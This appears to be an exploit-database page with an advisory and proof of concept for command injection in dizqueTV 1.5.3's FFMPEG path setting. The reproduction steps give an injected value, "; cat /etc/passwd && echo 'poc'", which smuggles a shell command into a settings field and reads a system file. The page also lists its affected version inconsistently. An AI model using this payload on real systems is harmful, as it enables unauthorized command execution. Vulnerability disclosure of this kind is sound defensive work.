header-logo
Suggest Exploit
vendor:
dizqueTV
by:
Ahmed Said Saud Al-Busaidi
8.1
CVSS
CRITICAL
Remote Code Execution (RCE)
78
CWE
Product Name: dizqueTV
Affected Version From: 1.5.2003
Affected Version To: 1.5.2003
Patch Exists: NO
Related CWE:
CPE: a:vexorian:dizquetv:1.5.3
Metasploit:
Other Scripts:
Platforms Tested: Linux
2024

dizqueTV 1.5.3 – Remote Code Execution (RCE)

dizqueTV version 1.5.3 is susceptible to a remote code execution vulnerability that allows attackers to execute unauthorized commands remotely. By manipulating the FFMPEG Executable Path in the settings to include a malicious command like "; cat /etc/passwd && echo 'poc'", an attacker can view the content of /etc/passwd.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user inputs and validate configurations. Additionally, access controls should be implemented to restrict unauthorized access to sensitive functionalities.
Source

Exploit-DB raw data:

# Exploit Title: dizqueTV 1.5.3 - Remote Code Execution (RCE)
# Date: 9/21/2024
# Exploit Author: Ahmed Said Saud Al-Busaidi
# Vendor Homepage: https://github.com/vexorian/dizquetv
# Version: 1.5.3
# Tested on: linux

POC:

## Vulnerability Description

dizqueTV 1.5.3 is vulnerable to unauthorized remote code execution from attackers.

## STEPS TO REPRODUCE

1. go to http://localhost/#!/settings 

2. now go to ffmpeg settings and change the FFMPEG Executable Path to: "; cat /etc/passwd && echo 'poc'"

3. click on update

4. now visit http://localhost/#!/version or click on version and you should see the content of /etc/passwd